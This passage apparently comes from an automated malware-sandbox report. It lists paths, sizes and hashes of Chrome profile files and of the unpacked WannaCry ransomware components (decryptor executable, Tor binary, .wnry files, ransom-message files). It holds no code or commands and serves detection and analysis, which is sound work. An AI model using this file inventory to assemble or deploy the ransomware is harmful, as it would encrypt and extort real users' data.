                                                                                                      b2bbeacbe6f9b3a8ad1c1eac9dbcfef4f506ce2335010cecffe03d0456806979a10623eed36f8d79b793257d53372fd867a56337fba25a6ddd18f35b258bfcea

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                      Filesize

                                                                                                      72KB

                                                                                                      MD5

                                                                                                      d0f4faec14fe3a7d1bd4a7d20d74165c

                                                                                                      SHA1

                                                                                                      7113bfda8911fabf704cb401837facecc6abc800

                                                                                                      SHA256

                                                                                                      e97d1451856ba62a3493c938382a53ea4ce99cfb4cff7fa6c1380431900f1405

                                                                                                      SHA512

                                                                                                      65758275c91770175c70aa1eed3e7895288ca52470322ef55b6802a8f9d72ca37518138de02bc6b779cf7e0fb5d9284dd12100c56fcce3df33cfcfc62df2d497

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                      Filesize

                                                                                                      142KB

                                                                                                      MD5

                                                                                                      c26f790c2618f9c97db764aab96ef558

                                                                                                      SHA1

                                                                                                      868cf264716ed9679ef55e489965b6a1e334366a

                                                                                                      SHA256

                                                                                                      09cab7f9860e05692d86a3dab6f7369da0233baf70c6362dd2462e67eb72d56b

                                                                                                      SHA512

                                                                                                      80a57eaef530fc77940589dabcb9a6ea4fbe422f570e950821130f7b7f807a06baa9c9227e7191209b5c7d4b1424d80d3022e0a125cbe8ea0cf5bc7159c1279c

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                      Filesize

                                                                                                      142KB

                                                                                                      MD5

                                                                                                      568a094048791fcbcdc3b70dfd30a7c9

                                                                                                      SHA1

                                                                                                      498898378daef77de5c6b798d19faefeec8539df

                                                                                                      SHA256

                                                                                                      17e3c9b95598b957f4735f369052e22996a0d4595b887525723c9499de78efbd

                                                                                                      SHA512

                                                                                                      870e87b29f6dc201c2ff77331e8a7d683258a66148e7667f857bb42e31a796c139be2717de1a92b1bf8206e44ba1f0dd8039f3ade56283b730aa7e624e630f90

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
                                                                                                      Filesize

                                                                                                      102KB

                                                                                                      MD5

                                                                                                      69ba0b347e76e5ea212eccaafa26e1d2

                                                                                                      SHA1

                                                                                                      6558ec48ffc9b12b24036be2c62c60d581c5da6a

                                                                                                      SHA256

                                                                                                      832e7729faaee91b5d7cea7fc6fe58c5f6123833b140eba995940c6dfd47c98d

                                                                                                      SHA512

                                                                                                      a25b96a4df25882f050cf0dbc07f8015c4538708ceee847f307366321cb890eada28c7df13f8059dff838c7a865cfbd330da339d0f9079cb626a137f716a429c

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
                                                                                                      Filesize

                                                                                                      111KB

                                                                                                      MD5

                                                                                                      0c7ecd311ffd0315e337dddbd47b59a1

                                                                                                      SHA1

                                                                                                      0dcf75f85d2e35cf7fbb3cd956cd1c742134f8e2

                                                                                                      SHA256

                                                                                                      b993ea7a0200fe8a11e3317f38bebcb6d5703db09e472d614f4f98d34df731d9

                                                                                                      SHA512

                                                                                                      48e35168294eb9b049cc663175447675f46d61dda03933c061f5fd9e601a9409d93cf5521573542ff50e5c89e2884e52b62f6206c19afb3664eb53fe21735f43

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe599b0d.TMP
                                                                                                      Filesize

                                                                                                      99KB

                                                                                                      MD5

                                                                                                      7d2ac1549fed5d5735557b121d9c2bd1

                                                                                                      SHA1

                                                                                                      02904b34b3d464fd5e0267f98c6c0ddc9a511264

                                                                                                      SHA256

                                                                                                      4dd7d01859be4bf63f7924c8e62d1ef8b14b4026b4d3f595d04c6335c58e48f1

                                                                                                      SHA512

                                                                                                      1ece4b99732f93fa71d872a3a9da1376d2bc68973edb2f8a5e1c2f6e651cbb018edd5a40a73934be66aec535ce5cebbee6db79c266481cd32a6fa699fef08cc7

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
                                                                                                      Filesize

                                                                                                      2B

                                                                                                      MD5

                                                                                                      99914b932bd37a50b983c5e7c90ae93b

                                                                                                      SHA1

                                                                                                      bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                      SHA256

                                                                                                      44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                      SHA512

                                                                                                      27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@Please_Read_Me@.txt
                                                                                                      Filesize

                                                                                                      933B

                                                                                                      MD5

                                                                                                      7a2726bb6e6a79fb1d092b7f2b688af0

                                                                                                      SHA1

                                                                                                      b3effadce8b76aee8cd6ce2eccbb8701797468a2

                                                                                                      SHA256

                                                                                                      840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

                                                                                                      SHA512

                                                                                                      4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                      Filesize

                                                                                                      240KB

                                                                                                      MD5

                                                                                                      7bf2b57f2a205768755c07f238fb32cc

                                                                                                      SHA1

                                                                                                      45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                      SHA256

                                                                                                      b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                      SHA512

                                                                                                      91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe
                                                                                                      Filesize

                                                                                                      3.0MB

                                                                                                      MD5

                                                                                                      fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                                      SHA1

                                                                                                      53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                                      SHA256

                                                                                                      e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                                      SHA512

                                                                                                      8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry
                                                                                                      Filesize

                                                                                                      1.4MB

                                                                                                      MD5

                                                                                                      c17170262312f3be7027bc2ca825bf0c

                                                                                                      SHA1

                                                                                                      f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                      SHA256

                                                                                                      d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                      SHA512

                                                                                                      c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry
                                                                                                      Filesize

                                                                                                      780B

                                                                                                      MD5

                                                                                                      8124a611153cd3aceb85a7ac58eaa25d

                                                                                                      SHA1

                                                                                                      c1d5cd8774261d810dca9b6a8e478d01cd4995d6

                                                                                                      SHA256

                                                                                                      0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

                                                                                                      SHA512

                                                                                                      b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry
                                                                                                      Filesize

                                                                                                      46KB

                                                                                                      MD5

                                                                                                      95673b0f968c0f55b32204361940d184

                                                                                                      SHA1

                                                                                                      81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                      SHA256

                                                                                                      40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                      SHA512

                                                                                                      7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnry
                                                                                                      Filesize

                                                                                                      53KB

                                                                                                      MD5

                                                                                                      0252d45ca21c8e43c9742285c48e91ad

                                                                                                      SHA1

                                                                                                      5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                                      SHA256

                                                                                                      845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                                      SHA512

                                                                                                      1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnry
                                                                                                      Filesize

                                                                                                      77KB

                                                                                                      MD5

                                                                                                      2efc3690d67cd073a9406a25005f7cea

                                                                                                      SHA1

                                                                                                      52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                                      SHA256

                                                                                                      5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                                      SHA512

                                                                                                      0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnry
                                                                                                      Filesize

                                                                                                      38KB

                                                                                                      MD5

                                                                                                      17194003fa70ce477326ce2f6deeb270

                                                                                                      SHA1

                                                                                                      e325988f68d327743926ea317abb9882f347fa73

                                                                                                      SHA256

                                                                                                      3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                                                                                      SHA512

                                                                                                      dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnry
                                                                                                      Filesize

                                                                                                      39KB

                                                                                                      MD5

                                                                                                      537efeecdfa94cc421e58fd82a58ba9e

                                                                                                      SHA1

                                                                                                      3609456e16bc16ba447979f3aa69221290ec17d0

                                                                                                      SHA256

                                                                                                      5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                                                                                      SHA512

                                                                                                      e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      2c5a3b81d5c4715b7bea01033367fcb5

                                                                                                      SHA1

                                                                                                      b548b45da8463e17199daafd34c23591f94e82cd

                                                                                                      SHA256

                                                                                                      a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                                                                                      SHA512

                                                                                                      490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      7a8d499407c6a647c03c4471a67eaad7

                                                                                                      SHA1

                                                                                                      d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                                                                                      SHA256

                                                                                                      2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                                                                                      SHA512

                                                                                                      608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      fe68c2dc0d2419b38f44d83f2fcf232e

                                                                                                      SHA1

                                                                                                      6c6e49949957215aa2f3dfb72207d249adf36283

                                                                                                      SHA256

                                                                                                      26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                                                                                      SHA512

                                                                                                      941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      08b9e69b57e4c9b966664f8e1c27ab09

                                                                                                      SHA1

                                                                                                      2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                                                                                      SHA256

                                                                                                      d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                                                                                      SHA512

                                                                                                      966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry
                                                                                                      Filesize

                                                                                                      37KB

                                                                                                      MD5

                                                                                                      35c2f97eea8819b1caebd23fee732d8f

                                                                                                      SHA1

                                                                                                      e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                      SHA256

                                                                                                      1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                      SHA512

                                                                                                      908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry
                                                                                                      Filesize

                                                                                                      37KB

                                                                                                      MD5

                                                                                                      35c2f97eea8819b1caebd23fee732d8f

                                                                                                      SHA1

                                                                                                      e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                      SHA256

                                                                                                      1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                      SHA512

                                                                                                      908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnry
                                                                                                      Filesize

                                                                                                      37KB

                                                                                                      MD5

                                                                                                      4e57113a6bf6b88fdd32782a4a381274

                                                                                                      SHA1

                                                                                                      0fccbc91f0f94453d91670c6794f71348711061d

                                                                                                      SHA256

                                                                                                      9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                                                                                      SHA512

                                                                                                      4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      3d59bbb5553fe03a89f817819540f469

                                                                                                      SHA1

                                                                                                      26781d4b06ff704800b463d0f1fca3afd923a9fe

                                                                                                      SHA256

                                                                                                      2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                                                                                      SHA512

                                                                                                      95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_greek.wnry
                                                                                                      Filesize

                                                                                                      47KB

                                                                                                      MD5

                                                                                                      fb4e8718fea95bb7479727fde80cb424

                                                                                                      SHA1

                                                                                                      1088c7653cba385fe994e9ae34a6595898f20aeb

                                                                                                      SHA256

                                                                                                      e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                                                                                      SHA512

                                                                                                      24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_indonesian.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      3788f91c694dfc48e12417ce93356b0f

                                                                                                      SHA1

                                                                                                      eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                                                                                      SHA256

                                                                                                      23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                                                                                      SHA512

                                                                                                      b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_italian.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      30a200f78498990095b36f574b6e8690

                                                                                                      SHA1

                                                                                                      c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                                                                                      SHA256

                                                                                                      49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                                                                                      SHA512

                                                                                                      c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_japanese.wnry
                                                                                                      Filesize

                                                                                                      79KB

                                                                                                      MD5

                                                                                                      b77e1221f7ecd0b5d696cb66cda1609e

                                                                                                      SHA1

                                                                                                      51eb7a254a33d05edf188ded653005dc82de8a46

                                                                                                      SHA256

                                                                                                      7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                                                                                      SHA512

                                                                                                      f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_korean.wnry
                                                                                                      Filesize

                                                                                                      89KB

                                                                                                      MD5

                                                                                                      6735cb43fe44832b061eeb3f5956b099

                                                                                                      SHA1

                                                                                                      d636daf64d524f81367ea92fdafa3726c909bee1

                                                                                                      SHA256

                                                                                                      552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                                                                                      SHA512

                                                                                                      60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_latvian.wnry
                                                                                                      Filesize

                                                                                                      40KB

                                                                                                      MD5

                                                                                                      c33afb4ecc04ee1bcc6975bea49abe40

                                                                                                      SHA1

                                                                                                      fbea4f170507cde02b839527ef50b7ec74b4821f

                                                                                                      SHA256

                                                                                                      a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                                                                                      SHA512

                                                                                                      0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_norwegian.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      ff70cc7c00951084175d12128ce02399

                                                                                                      SHA1

                                                                                                      75ad3b1ad4fb14813882d88e952208c648f1fd18

                                                                                                      SHA256

                                                                                                      cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                                                                                      SHA512

                                                                                                      f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_polish.wnry
                                                                                                      Filesize

                                                                                                      38KB

                                                                                                      MD5

                                                                                                      e79d7f2833a9c2e2553c7fe04a1b63f4

                                                                                                      SHA1

                                                                                                      3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                                                                                      SHA256

                                                                                                      519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                                                                                      SHA512

                                                                                                      e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_portuguese.wnry
                                                                                                      Filesize

                                                                                                      37KB

                                                                                                      MD5

                                                                                                      fa948f7d8dfb21ceddd6794f2d56b44f

                                                                                                      SHA1

                                                                                                      ca915fbe020caa88dd776d89632d7866f660fc7a

                                                                                                      SHA256

                                                                                                      bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                                                                                      SHA512

                                                                                                      0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_romanian.wnry
                                                                                                      Filesize

                                                                                                      50KB

                                                                                                      MD5

                                                                                                      313e0ececd24f4fa1504118a11bc7986

                                                                                                      SHA1

                                                                                                      e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                                                                                      SHA256

                                                                                                      70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                                                                                      SHA512

                                                                                                      c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_russian.wnry
                                                                                                      Filesize

                                                                                                      46KB

                                                                                                      MD5

                                                                                                      452615db2336d60af7e2057481e4cab5

                                                                                                      SHA1

                                                                                                      442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

                                                                                                      SHA256

                                                                                                      02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

                                                                                                      SHA512

                                                                                                      7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_slovak.wnry
                                                                                                      Filesize

                                                                                                      40KB

                                                                                                      MD5

                                                                                                      c911aba4ab1da6c28cf86338ab2ab6cc

                                                                                                      SHA1

                                                                                                      fee0fd58b8efe76077620d8abc7500dbfef7c5b0

                                                                                                      SHA256

                                                                                                      e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

                                                                                                      SHA512

                                                                                                      3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_spanish.wnry
                                                                                                      Filesize

                                                                                                      36KB

                                                                                                      MD5

                                                                                                      8d61648d34cba8ae9d1e2a219019add1

                                                                                                      SHA1

                                                                                                      2091e42fc17a0cc2f235650f7aad87abf8ba22c2

                                                                                                      SHA256

                                                                                                      72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

                                                                                                      SHA512

                                                                                                      68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_swedish.wnry
                                                                                                      Filesize

                                                                                                      37KB

                                                                                                      MD5

                                                                                                      c7a19984eb9f37198652eaf2fd1ee25c

                                                                                                      SHA1

                                                                                                      06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

                                                                                                      SHA256

                                                                                                      146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

                                                                                                      SHA512

                                                                                                      43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_turkish.wnry
                                                                                                      Filesize

                                                                                                      41KB

                                                                                                      MD5

                                                                                                      531ba6b1a5460fc9446946f91cc8c94b

                                                                                                      SHA1

                                                                                                      cc56978681bd546fd82d87926b5d9905c92a5803

                                                                                                      SHA256

                                                                                                      6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

                                                                                                      SHA512

                                                                                                      ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_vietnamese.wnry
                                                                                                      Filesize

                                                                                                      91KB

                                                                                                      MD5

                                                                                                      8419be28a0dcec3f55823620922b00fa

                                                                                                      SHA1

                                                                                                      2e4791f9cdfca8abf345d606f313d22b36c46b92

                                                                                                      SHA256

                                                                                                      1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

                                                                                                      SHA512

                                                                                                      8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry
                                                                                                      Filesize

                                                                                                      864B

                                                                                                      MD5

                                                                                                      3e0020fc529b1c2a061016dd2469ba96

                                                                                                      SHA1

                                                                                                      c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

                                                                                                      SHA256

                                                                                                      402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

                                                                                                      SHA512

                                                                                                      5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\s.wnry
                                                                                                      Filesize

                                                                                                      2.9MB

                                                                                                      MD5

                                                                                                      ad4c9de7c8c40813f200ba1c2fa33083

                                                                                                      SHA1

                                                                                                      d1af27518d455d432b62d73c6a1497d032f6120e

                                                                                                      SHA256

                                                                                                      e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

                                                                                                      SHA512

                                                                                                      115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\t.wnry
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                      MD5

                                                                                                      5dcaac857e695a65f5c3ef1441a73a8f

                                                                                                      SHA1

                                                                                                      7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

                                                                                                      SHA256

                                                                                                      97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

                                                                                                      SHA512

                                                                                                      06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                      Filesize

                                                                                                      20KB

                                                                                                      MD5

                                                                                                      4fef5e34143e646dbf9907c4374276f5

                                                                                                      SHA1

                                                                                                      47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                                                                                      SHA256

                                                                                                      4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                                                                                      SHA512

